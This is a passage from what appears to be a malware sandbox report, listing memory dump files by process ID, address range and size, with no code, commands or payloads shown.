                            • memory/2240-9-0x0000000000000000-mapping.dmp
                            • memory/2436-213-0x0000000000BA0000-0x0000000000BA1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2436-216-0x0000000005340000-0x0000000005341000-memory.dmp
                              Filesize

                              4KB

                            • memory/2436-221-0x000000000B000000-0x000000000B051000-memory.dmp
                              Filesize

                              324KB

                            • memory/2436-206-0x0000000072FE0000-0x00000000736CE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2436-204-0x0000000000000000-mapping.dmp
                            • memory/2528-344-0x0000000072650000-0x0000000072D3E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2528-341-0x0000000000000000-mapping.dmp
                            • memory/2572-168-0x0000000000000000-mapping.dmp
                            • memory/2624-382-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/2624-378-0x0000000000000000-mapping.dmp
                            • memory/2676-170-0x0000000000000000-mapping.dmp
                            • memory/2688-10-0x0000000000000000-mapping.dmp
                            • memory/2772-254-0x0000000000000000-mapping.dmp
                            • memory/2824-309-0x0000000000000000-mapping.dmp
                            • memory/3024-7-0x0000000000000000-mapping.dmp
                            • memory/3196-25-0x0000000000000000-mapping.dmp
                            • memory/3272-20-0x0000000006EC0000-0x0000000006EC1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3272-14-0x0000000070B30000-0x000000007121E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/3272-30-0x0000000006C00000-0x0000000006C01000-memory.dmp
                              Filesize

                              4KB

                            • memory/3272-95-0x0000000009240000-0x0000000009241000-memory.dmp
                              Filesize

                              4KB

                            • memory/3272-12-0x0000000000000000-mapping.dmp
                            • memory/3272-97-0x000000000A0C0000-0x000000000A0C1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3272-96-0x0000000007EA0000-0x0000000007EA1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3272-18-0x0000000000E60000-0x0000000000E61000-memory.dmp
                              Filesize

                              4KB

                            • memory/3272-37-0x00000000076D0000-0x00000000076D1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3272-49-0x0000000006E80000-0x0000000006E81000-memory.dmp
                              Filesize

                              4KB

                            • memory/3272-52-0x0000000007DD0000-0x0000000007DD1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3276-23-0x0000000000000000-mapping.dmp
                            • memory/3420-217-0x0000000000000000-mapping.dmp
                            • memory/3524-191-0x0000000000000000-mapping.dmp
                            • memory/3680-357-0x0000000009650000-0x0000000009651000-memory.dmp
                              Filesize

                              4KB

                            • memory/3680-306-0x0000000072650000-0x0000000072D3E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/3680-305-0x0000000000000000-mapping.dmp
                            • memory/3680-313-0x0000000007BE0000-0x0000000007BE1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3680-362-0x0000000009640000-0x0000000009641000-memory.dmp
                              Filesize

                              4KB

                            • memory/3680-324-0x00000000085E0000-0x00000000085E1000-memory.dmp
                              Filesize

                              4KB

                            • memory/3680-331-0x00000000093B0000-0x00000000093E3000-memory.dmp
                              Filesize

                              204KB

                            • memory/3680-338-0x0000000009390000-0x0000000009391000-memory.dmp
                              Filesize

                              4KB

                            • memory/3680-339-0x00000000094F0000-0x00000000094F1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4048-17-0x0000000000000000-mapping.dmp
                            • memory/4116-199-0x0000000000400000-0x0000000000493000-memory.dmp
                              Filesize

                              588KB

                            • memory/4116-200-0x000000000043FCC3-mapping.dmp
                            • memory/4116-202-0x0000000000400000-0x0000000000493000-memory.dmp
                              Filesize

                              588KB

                            • memory/4128-389-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4128-384-0x0000000000000000-mapping.dmp
                            • memory/4176-129-0x0000000000400000-0x0000000000498000-memory.dmp
                              Filesize

                              608KB

                            • memory/4176-127-0x000000000043FCC3-mapping.dmp
                            • memory/4176-126-0x0000000000400000-0x0000000000498000-memory.dmp
                              Filesize

                              608KB

                            • memory/4248-135-0x0000000000400000-0x0000000000439000-memory.dmp
                              Filesize

                              228KB

                            • memory/4248-130-0x0000000000400000-0x0000000000439000-memory.dmp
                              Filesize

                              228KB

                            • memory/4248-132-0x0000000000417A8B-mapping.dmp
                            • memory/4252-356-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4252-354-0x0000000000000000-mapping.dmp
                            • memory/4276-137-0x0000000000400000-0x0000000000425000-memory.dmp
                              Filesize

                              148KB

                            • memory/4276-131-0x0000000000400000-0x0000000000425000-memory.dmp
                              Filesize

                              148KB

                            • memory/4276-133-0x000000000041A684-mapping.dmp
                            • memory/4280-365-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4280-360-0x0000000000000000-mapping.dmp
                            • memory/4312-399-0x00000000074D0000-0x00000000074D1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4312-274-0x0000000005090000-0x0000000005091000-memory.dmp
                              Filesize

                              4KB

                            • memory/4312-267-0x0000000000830000-0x0000000000831000-memory.dmp
                              Filesize

                              4KB

                            • memory/4312-343-0x0000000007200000-0x0000000007224000-memory.dmp
                              Filesize

                              144KB

                            • memory/4312-266-0x0000000072650000-0x0000000072D3E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4312-340-0x0000000006FD0000-0x0000000006FF3000-memory.dmp
                              Filesize

                              140KB

                            • memory/4312-263-0x0000000000000000-mapping.dmp
                            • memory/4320-262-0x0000000000400000-0x0000000000420000-memory.dmp
                              Filesize

                              128KB

                            • memory/4320-260-0x000000000041A684-mapping.dmp
                            • memory/4320-259-0x0000000000400000-0x0000000000420000-memory.dmp
                              Filesize

                              128KB

                            • memory/4324-359-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4324-355-0x0000000000000000-mapping.dmp
                            • memory/4344-62-0x0000000000000000-mapping.dmp
                            • memory/4352-288-0x0000000000000000-mapping.dmp
                            • memory/4376-387-0x0000000000000000-mapping.dmp
                            • memory/4376-393-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4416-63-0x0000000000000000-mapping.dmp
                            • memory/4416-64-0x0000000070B30000-0x000000007121E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4496-66-0x0000000000000000-mapping.dmp
                            • memory/4508-235-0x0000000000880000-0x0000000000881000-memory.dmp
                              Filesize

                              4KB

                            • memory/4508-256-0x00000000052A0000-0x00000000052C4000-memory.dmp
                              Filesize

                              144KB

                            • memory/4508-237-0x0000000000F10000-0x0000000000F11000-memory.dmp
                              Filesize

                              4KB

                            • memory/4508-234-0x0000000072FE0000-0x00000000736CE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4508-232-0x0000000000000000-mapping.dmp
                            • memory/4532-328-0x000001E430EA0000-0x000001E430EA1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4532-329-0x000001E431050000-0x000001E431051000-memory.dmp
                              Filesize

                              4KB

                            • memory/4532-327-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4532-325-0x0000000000000000-mapping.dmp
                            • memory/4540-319-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4540-316-0x0000000000000000-mapping.dmp
                            • memory/4540-315-0x0000000000000000-mapping.dmp
                            • memory/4540-322-0x00000000009D0000-0x00000000009D1000-memory.dmp
                              Filesize

                              4KB

                            • memory/4548-390-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4548-386-0x0000000000000000-mapping.dmp
                            • memory/4608-82-0x0000000070B30000-0x000000007121E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4608-71-0x0000000000000000-mapping.dmp
                            • memory/4640-228-0x0000000000417A8B-mapping.dmp
                            • memory/4640-227-0x0000000000400000-0x0000000000434000-memory.dmp
                              Filesize

                              208KB

                            • memory/4640-230-0x0000000000400000-0x0000000000434000-memory.dmp
                              Filesize

                              208KB

                            • memory/4696-321-0x0000000000000000-mapping.dmp
                            • memory/4712-361-0x0000000000000000-mapping.dmp
                            • memory/4712-370-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4720-154-0x0000000000000000-mapping.dmp
                            • memory/4736-179-0x0000000000400000-0x0000000000498000-memory.dmp
                              Filesize

                              608KB

                            • memory/4736-177-0x000000000043FCC3-mapping.dmp
                            • memory/4744-388-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/4744-381-0x0000000000000000-mapping.dmp
                            • memory/4836-223-0x0000000000000000-mapping.dmp
                            • memory/4920-253-0x0000000000000000-mapping.dmp
                            • memory/4924-101-0x0000000000000000-mapping.dmp
                            • memory/4928-193-0x0000000000000000-mapping.dmp
                            • memory/4968-181-0x0000000000417A8B-mapping.dmp
                            • memory/4968-185-0x0000000000400000-0x0000000000439000-memory.dmp
                              Filesize

                              228KB

                            • memory/4972-184-0x000000000041A684-mapping.dmp
                            • memory/4984-106-0x0000000000000000-mapping.dmp
                            • memory/4984-190-0x0000000004EE0000-0x0000000004F90000-memory.dmp
                              Filesize

                              704KB

                            • memory/4984-192-0x0000000004F90000-0x0000000004F91000-memory.dmp
                              Filesize

                              4KB

                            • memory/4984-194-0x0000000005060000-0x000000000506D000-memory.dmp
                              Filesize

                              52KB

                            • memory/4984-109-0x0000000070B30000-0x000000007121E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/4984-115-0x00000000000D0000-0x00000000000D1000-memory.dmp
                              Filesize

                              4KB

                            • memory/5020-279-0x0000000000000000-mapping.dmp
                            • memory/5060-112-0x0000000000000000-mapping.dmp
                            • memory/5084-303-0x000000000AF10000-0x000000000AF13000-memory.dmp
                              Filesize

                              12KB

                            • memory/5084-294-0x00000000052A0000-0x00000000052B1000-memory.dmp
                              Filesize

                              68KB

                            • memory/5084-289-0x00000000012F0000-0x00000000012F1000-memory.dmp
                              Filesize

                              4KB

                            • memory/5084-285-0x00000000009E0000-0x00000000009E1000-memory.dmp
                              Filesize

                              4KB

                            • memory/5084-282-0x0000000072650000-0x0000000072D3E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/5084-278-0x0000000000000000-mapping.dmp
                            • memory/5096-118-0x0000000000000000-mapping.dmp
                            • memory/5100-195-0x0000000000000000-mapping.dmp
                            • memory/5300-404-0x0000000000000000-mapping.dmp
                            • memory/5300-411-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/5384-409-0x0000000000000000-mapping.dmp
                            • memory/5384-412-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/5560-460-0x0000000000000000-mapping.dmp
                            • memory/5560-474-0x0000000000000000-mapping.dmp
                            • memory/5560-445-0x0000000000000000-mapping.dmp
                            • memory/5560-443-0x0000000000000000-mapping.dmp
                            • memory/5560-441-0x0000000000000000-mapping.dmp
                            • memory/5560-451-0x0000000000000000-mapping.dmp
                            • memory/5560-453-0x0000000000000000-mapping.dmp
                            • memory/5560-455-0x0000000000000000-mapping.dmp
                            • memory/5560-457-0x0000000000000000-mapping.dmp
                            • memory/5560-438-0x0000000000000000-mapping.dmp
                            • memory/5560-424-0x0000000002F10000-0x0000000002F11000-memory.dmp
                              Filesize

                              4KB

                            • memory/5560-462-0x0000000000000000-mapping.dmp
                            • memory/5560-464-0x0000000000000000-mapping.dmp
                            • memory/5560-466-0x0000000000000000-mapping.dmp
                            • memory/5560-468-0x0000000000000000-mapping.dmp
                            • memory/5560-470-0x0000000000000000-mapping.dmp
                            • memory/5560-472-0x0000000000000000-mapping.dmp
                            • memory/5560-425-0x0000000000000000-mapping.dmp
                            • memory/5560-476-0x0000000000000000-mapping.dmp
                            • memory/5560-478-0x0000000000000000-mapping.dmp
                            • memory/5560-436-0x0000000000000000-mapping.dmp
                            • memory/5560-481-0x0000000000000000-mapping.dmp
                            • memory/5560-483-0x0000000000000000-mapping.dmp
                            • memory/5560-485-0x0000000000000000-mapping.dmp
                            • memory/5560-487-0x0000000000000000-mapping.dmp
                            • memory/5560-489-0x0000000000000000-mapping.dmp
                            • memory/5560-434-0x0000000000000000-mapping.dmp
                            • memory/5560-432-0x0000000000000000-mapping.dmp
                            • memory/5560-430-0x0000000000000000-mapping.dmp
                            • memory/5560-427-0x0000000000000000-mapping.dmp
                            • memory/5560-426-0x0000000002FD0000-0x0000000002FD1000-memory.dmp
                              Filesize

                              4KB

                            • memory/5576-415-0x0000000000000000-mapping.dmp
                            • memory/5576-417-0x00007FF9738C0000-0x00007FF9742AC000-memory.dmp
                              Filesize

                              9.9MB